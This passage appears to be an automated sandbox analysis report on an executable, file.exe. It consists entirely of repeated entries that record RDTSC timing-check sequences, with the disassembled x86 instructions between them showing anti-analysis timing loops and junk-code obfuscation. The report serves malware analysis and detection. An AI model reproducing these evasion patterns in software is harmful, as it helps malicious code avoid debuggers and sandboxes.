                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1372C second address: D13757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA252A1699h 0x00000008 jne 00007FDA252A1686h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13757 second address: D1375B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1375B second address: D13761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13CE2 second address: D13CFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FDA2529D36Dh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13CFD second address: D13D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13E85 second address: D13E8F instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13E8F second address: D13EA0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDA252A168Ch 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1769B second address: D1769F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1784B second address: D17884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FDA252A1693h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jc 00007FDA252A168Ah 0x00000017 push ebx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FDA252A168Ah 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17884 second address: D1788E instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1788E second address: D17898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FDA252A1686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17898 second address: D178BA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDA2529D370h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D178BA second address: D178C4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDA252A168Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D178C4 second address: D17923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D2DBEh], eax 0x0000000d sub dword ptr [ebp+122D33FDh], ebx 0x00000013 push 00000003h 0x00000015 mov ecx, dword ptr [ebp+122D33BAh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FDA2529D368h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 xor di, 69CAh 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D390Bh], esi 0x00000044 call 00007FDA2529D369h 0x00000049 push eax 0x0000004a jc 00007FDA2529D368h 0x00000050 pushad 0x00000051 popad 0x00000052 pop eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17923 second address: D1792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDA252A1686h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1792E second address: D1795E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D36Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 pop eax 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ecx 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007FDA2529D366h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1795E second address: D17962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17962 second address: D179A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D329Ah], ecx 0x0000000e lea ebx, dword ptr [ebp+124594F6h] 0x00000014 pushad 0x00000015 call 00007FDA2529D36Dh 0x0000001a call 00007FDA2529D36Dh 0x0000001f pop ebx 0x00000020 pop edx 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FDA2529D370h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D179A7 second address: D179CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FDA252A1686h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA252A1699h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D179CF second address: D179D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D179D5 second address: D179D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17A2C second address: D17A36 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37F86 second address: D37F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37F8C second address: D37FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c je 00007FDA2529D37Dh 0x00000012 jnp 00007FDA2529D377h 0x00000018 jmp 00007FDA2529D36Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36958 second address: D3699C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1692h 0x00000007 jl 00007FDA252A169Eh 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FDA252A1696h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDA252A168Ah 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3699C second address: D369A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D369A2 second address: D369A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36B57 second address: D36B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36C91 second address: D36CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDA252A1686h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FDA252A1686h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36CA6 second address: D36CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36CAA second address: D36CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDA252A1695h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36E1F second address: D36E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36F8E second address: D36F9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FDA252A1686h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36F9E second address: D36FA8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDA2529D366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D370F1 second address: D370FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDA252A168Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D370FB second address: D37108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 js 00007FDA2529D366h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D376FE second address: D37704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37704 second address: D37713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FDA2529D366h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37713 second address: D3771B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D378AD second address: D378B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D378B4 second address: D378BE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDA252A168Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37B62 second address: D37B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FDA2529D36Ah 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007FDA2529D378h 0x00000013 jno 00007FDA2529D366h 0x00000019 pop esi 0x0000001a pushad 0x0000001b jp 00007FDA2529D366h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AAE5 second address: D3AAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B14C second address: D3B17C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA2529D368h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FDA2529D36Ch 0x00000016 jmp 00007FDA2529D372h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B17C second address: D3B182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B182 second address: D3B186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39996 second address: D3999C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D428FB second address: D42903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42903 second address: D42907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42BFB second address: D42C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C00 second address: D42C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C06 second address: D42C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDA2529D372h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C27 second address: D42C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C2D second address: D42C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDA2529D379h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D451DF second address: D451EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA252A168Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D451EF second address: D45202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jo 00007FDA2529D36Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45202 second address: D4520A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4520A second address: D4520E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4520E second address: D4524B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c jmp 00007FDA252A1698h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push 83B72ECCh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FDA252A168Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4524B second address: D45250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45310 second address: D45314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4566D second address: D45672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4574E second address: D45752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45D58 second address: D45D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FDA2529D366h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FDA2529D377h 0x00000017 jmp 00007FDA2529D371h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC1 second address: D46FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC5 second address: D46FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D481D1 second address: D481D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FCB second address: D46FE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D36Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FDA2529D374h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D481D5 second address: D48237 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDA252A1688h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, eax 0x0000000d push 00000000h 0x0000000f jno 00007FDA252A1699h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FDA252A1688h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 xor dword ptr [ebp+122D1E89h], edx 0x00000037 mov dword ptr [ebp+122D1C00h], ecx 0x0000003d mov di, C6A1h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48237 second address: D4823D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C8C second address: D48C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496E9 second address: D496FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 js 00007FDA2529D386h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496FA second address: D496FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496FE second address: D49795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FDA2529D368h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 pushad 0x00000025 call 00007FDA2529D36Dh 0x0000002a adc ecx, 0A654D65h 0x00000030 pop esi 0x00000031 adc si, D39Bh 0x00000036 popad 0x00000037 mov dword ptr [ebp+122D1BB0h], esi 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D2DB1h], edi 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007FDA2529D368h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 xchg eax, ebx 0x00000062 jns 00007FDA2529D36Ah 0x00000068 push eax 0x00000069 push ecx 0x0000006a push eax 0x0000006b push edx 0x0000006c push ecx 0x0000006d pop ecx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49795 second address: D49799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A25C second address: D4A262 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A262 second address: D4A268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ACD9 second address: D4AD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA2529D366h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FDA2529D375h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AD05 second address: D4AD0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AD0B second address: D4ADA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FDA2529D368h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov esi, dword ptr [ebp+122D2A16h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FDA2529D368h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 adc edi, 76E077C9h 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 push ebx 0x00000051 push edi 0x00000052 pop edi 0x00000053 pop ebx 0x00000054 jmp 00007FDA2529D372h 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FDA2529D36Ch 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ADA3 second address: D4ADBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA252A1694h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7C7 second address: D4B7D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7D3 second address: D4B7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7D8 second address: D4B7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7DE second address: D4B7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BF7C second address: D4BFA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D378h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA2529D36Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BFA7 second address: D4BFBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
